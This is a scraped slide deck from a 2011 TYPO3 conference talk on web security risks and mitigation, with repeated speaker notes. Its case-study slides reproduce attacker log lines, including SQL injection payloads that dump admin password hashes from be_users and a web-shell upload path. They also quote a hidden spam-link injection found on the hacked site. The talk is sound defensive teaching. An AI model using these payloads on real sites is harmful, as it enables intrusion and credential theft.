![Knowing the Enemy
Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]
"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200
54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-37-2048.jpg)
![Knowing the Enemy
Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]
"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select
+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,
30,31,32,33+--+ HTTP/1.1" 200
54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-38-2048.jpg)
![Knowing the Enemy
Searching for vulnerabilities
14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-39-2048.jpg)
![Knowing the Enemy
Searching for vulnerabilities
14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010'
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-40-2048.jpg)
![Knowing the Enemy
Searching for vulnerabilities
14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-41-2048.jpg)
![Knowing the Enemy
Searching for vulnerabilities
14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 --
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-42-2048.jpg)
![Knowing the Enemy
Found something!
14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
order by 10 --
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-43-2048.jpg)
![Knowing the Enemy
Forging the exploit
14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-44-2048.jpg)
![Knowing the Enemy
Exploit working!
14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010
union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,user
name,password,admin)),20,21,22 from be_users where admin=1 --
Now the hacker has the md5 hashes of
all admin passwords
Inspiring people to
TYPO Security - Risks and Mitigation share](https://image.slidesharecdn.com/t3con11sf-security-110610191551-phpapp02/75/TYPO3-Security-Risks-and-Mitigation-45-2048.jpg)
Uploaded byHelmut Hummel
TYPO3 Security - Risks and Mitigation
The document discusses a presentation about TYPO3 security risks and mitigation. It begins with an introduction of the presenter and an overview of topics to be covered, including what security is, general security concepts, common attack vectors, a case study of how a hacker exploited a vulnerability, and methods for mitigating risks.
TYPO3 Security - Risks and Mitigation
- 1. TYPO3 Conference -San Francisco 2011 Inspiring TYPO Security - Risks and Mitigation sha
- 2. T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011 Helmut Hummel <helmut.hummel@typo3.org>
- 3. Introduction About me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people to TYPO Security - Risks and Mitigation share
- 4. TYPO Security -Risks and Mitigation Agenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people to TYPO Security - Risks and Mitigation share
- 5. What is Security? Inspiring people to TYPO Security - Risks and Mitigation share
- 6. Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people to TYPO Security - Risks and Mitigation share
- 7. What is Security? Criteriafor Security Inspiring people to TYPO Security - Risks and Mitigation share
- 8. What is Security? Criteriafor Security Privacy Inspiring people to TYPO Security - Risks and Mitigation share
- 9. What is Security? Criteriafor Security Privacy Integrity and Property Inspiring people to TYPO Security - Risks and Mitigation share
- 10. What is Security? Criteriafor Security Privacy Integrity and Property Availability and Intentional Use Inspiring people to TYPO Security - Risks and Mitigation share
- 11. Security is aprocess, not a product. (Bruce Schneier) Inspiring people to TYPO Security - Risks and Mitigation share
- 12. What is Security? Securityis a process Inspiring people to TYPO Security - Risks and Mitigation share
- 13. What is Security? Securityis a process Care taking and improvements over time Inspiring people to TYPO Security - Risks and Mitigation share
- 14. What is Security? Securityis a process Care taking and improvements over time Depending on your needs Inspiring people to TYPO Security - Risks and Mitigation share
- 15. What is Security? Securityis a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people to TYPO Security - Risks and Mitigation share
- 16. What is Security? WhyTYPO3 can be considered to be not insecure Inspiring people to TYPO Security - Risks and Mitigation share
- 17. What is Security? WhyTYPO3 can be considered to be not insecure TYPO3 Security Team takes care Inspiring people to TYPO Security - Risks and Mitigation share
- 18. What is Security? WhyTYPO3 can be considered to be not insecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people to TYPO Security - Risks and Mitigation share
- 19. What is Security? WhyTYPO3 can be considered to be not insecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people to TYPO Security - Risks and Mitigation share
- 20. General Security Concepts Inspiring people to TYPO Security - Risks and Mitigation share
- 21. General Security Concepts GeneralSecurity Concepts Inspiring people to TYPO Security - Risks and Mitigation share
- 22. General Security Concepts GeneralSecurity Concepts Defense in depth Inspiring people to TYPO Security - Risks and Mitigation share
- 23. General Security Concepts GeneralSecurity Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people to TYPO Security - Risks and Mitigation share
- 24. General Security Concepts GeneralSecurity Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people to TYPO Security - Risks and Mitigation share
- 25. General Security Concepts GeneralSecurity Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people to TYPO Security - Risks and Mitigation share
- 26. General Security Concepts GeneralSecurity Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people to TYPO Security - Risks and Mitigation share
- 27. Attack Vectors Inspiring people to TYPO Security - Risks and Mitigation share
- 28. Attack Vectors Attack Vectors Inspiring people to TYPO Security - Risks and Mitigation share
- 29. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Inspiring people to TYPO Security - Risks and Mitigation share
- 30. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people to TYPO Security - Risks and Mitigation share
- 31. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people to TYPO Security - Risks and Mitigation share
- 32. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people to TYPO Security - Risks and Mitigation share
- 33. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people to TYPO Security - Risks and Mitigation share
- 34. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people to TYPO Security - Risks and Mitigation share
- 35. Knowing the Enemy Inspiring people to TYPO Security - Risks and Mitigation share
- 36. Knowing the Enemy Theincident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people to TYPO Security - Risks and Mitigation share
- 37. Knowing the Enemy Searchingfor vulnerabilities 178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people to TYPO Security - Risks and Mitigation share
- 38. Knowing the Enemy Searchingfor vulnerabilities 178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people to TYPO Security - Risks and Mitigation share
- 39. Knowing the Enemy Searchingfor vulnerabilities 14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010 Inspiring people to TYPO Security - Risks and Mitigation share
- 40. Knowing the Enemy Searchingfor vulnerabilities 14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010' Inspiring people to TYPO Security - Risks and Mitigation share
- 41. Knowing the Enemy Searchingfor vulnerabilities 14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 Inspiring people to TYPO Security - Risks and Mitigation share
- 42. Knowing the Enemy Searchingfor vulnerabilities 14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 -- Inspiring people to TYPO Security - Risks and Mitigation share
- 43. Knowing the Enemy Foundsomething! 14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 order by 10 -- Inspiring people to TYPO Security - Risks and Mitigation share
- 44. Knowing the Enemy Forgingthe exploit 14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- Inspiring people to TYPO Security - Risks and Mitigation share
- 45. Knowing the Enemy Exploitworking! 14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,user name,password,admin)),20,21,22 from be_users where admin=1 -- Now the hacker has the md5 hashes of all admin passwords Inspiring people to TYPO Security - Risks and Mitigation share
- 46. Knowing the Enemy 15minutes later: Log in as admin! 14:21:48: /typo3/index.php 14:21:50: /typo3/backend.php Inspiring people to TYPO Security - Risks and Mitigation share
- 47. Knowing the Enemy Uploadingweb shell 14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/ typo3conf/ext/realurlmanagement/ 14:22:46: /typo3conf/ext/realurlmanagement/title.php You loose! Inspiring people to TYPO Security - Risks and Mitigation share
- 48. Knowing the Enemy Conclusion Inspiring people to TYPO Security - Risks and Mitigation share
- 49. Knowing the Enemy Conclusion Hackers know what they are doing Inspiring people to TYPO Security - Risks and Mitigation share
- 50. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well Inspiring people to TYPO Security - Risks and Mitigation share
- 51. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools Inspiring people to TYPO Security - Risks and Mitigation share
- 52. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack Inspiring people to TYPO Security - Risks and Mitigation share
- 53. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack With automated attacks effort is low, gain is high Inspiring people to TYPO Security - Risks and Mitigation share
- 54. Mitigation Inspiring people to TYPO Security - Risks and Mitigation share
- 55. Mitiation Mandatory steps Inspiring people to TYPO Security - Risks and Mitigation share
- 56. Mitiation Mandatory steps Monitor and Back Up your Website Inspiring people to TYPO Security - Risks and Mitigation share
- 57. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Inspiring people to TYPO Security - Risks and Mitigation share
- 58. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Inspiring people to TYPO Security - Risks and Mitigation share
- 59. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Inspiring people to TYPO Security - Risks and Mitigation share
- 60. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Make your Integrators aware of possible TypoScript problems Inspiring people to TYPO Security - Risks and Mitigation share
- 61. Mitiation Advanced steps Inspiring people to TYPO Security - Risks and Mitigation share
- 62. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Inspiring people to TYPO Security - Risks and Mitigation share
- 63. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Inspiring people to TYPO Security - Risks and Mitigation share
- 64. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Inspiring people to TYPO Security - Risks and Mitigation share
- 65. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Consider using phpids TYPO3 Extension Inspiring people to TYPO Security - Risks and Mitigation share
- 66. TYPO3 Security Team Inspiring people to TYPO Security - Risks and Mitigation share
- 67. TYPO3 Security Team Importantthings to know Inspiring people to TYPO Security - Risks and Mitigation share
- 68. TYPO3 Security Team Importantthings to know Responsible Disclosure Policy Inspiring people to TYPO Security - Risks and Mitigation share
- 69. TYPO3 Security Team Importantthings to know Responsible Disclosure Policy One communication channel (security@typo3.org) Inspiring people to TYPO Security - Risks and Mitigation share
- 70. TYPO3 Security Team Importantthings to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only Inspiring people to TYPO Security - Risks and Mitigation share
- 71. TYPO3 Security Team Importantthings to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only You can support us Inspiring people to TYPO Security - Risks and Mitigation share
- 72. TYPO Security -Risks and Mitigation Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://typo3.org/teams/security/security- bulletins/ http://typo3.org/teams/security/resources/ http://buzz.typo3.org/teams/security/ Inspiring people to TYPO Security - Risks and Mitigation share
- 73. Questions? Inspiring people to TYPO Security - Risks and Mitigation share
- 74. Thank You! Inspiring people to TYPO Security - Risks and Mitigation share
- 76. inspiring people toshare.
Editor's Notes
- #2 1\n2\n3\n4\n5\n6\n7\n
- #3 \n
- #4 \n
- #5 Interrupt me immediatly if you have questions\n
- #6 Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\nWhy it is important to define?\n\n\n
- #7 It depends ;)\n\n
- #8 Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &#x201E;subject&#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
- #9 Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &#x201E;subject&#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
- #10 Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &#x201E;subject&#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
- #11 \n
- #12 Caretaking: \n* Replace broken, not working locks, don&#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
- #13 Caretaking: \n* Replace broken, not working locks, don&#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
- #14 Caretaking: \n* Replace broken, not working locks, don&#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n->If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
- #15 Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
- #16 Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
- #17 Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
- #18 Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
- #19 Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
- #20 Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
- #21 Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
- #22 Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
- #23 Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &#x201E;secret&#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
- #24 \n
- #25 \n
- #26 \n
- #27 \n
- #28 \n
- #29 \n
- #30 \n
- #31 \n
- #32 \n
- #33 \n
- #34 \n
- #35 \n
- #36 \n
- #37 \n
- #38 \n
- #39 \n
- #40 \n
- #41 \n
- #42 \n
- #43 \n
- #44 Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
- #45 Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
- #46 Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
- #47 Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
- #48 Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &#x201E;small websites&#x201C; are targeted\n
- #49 Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
- #50 Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
- #51 Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
- #52 Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
- #53 Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
- #54 Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
- #55 Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
- #56 TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
- #57 TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
- #58 TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
- #59 TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
- #60 Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
- #61 RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
- #62 RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
- #63 RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
- #64 RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
- #65 \n
- #66 Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
- #67 Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
- #68 \n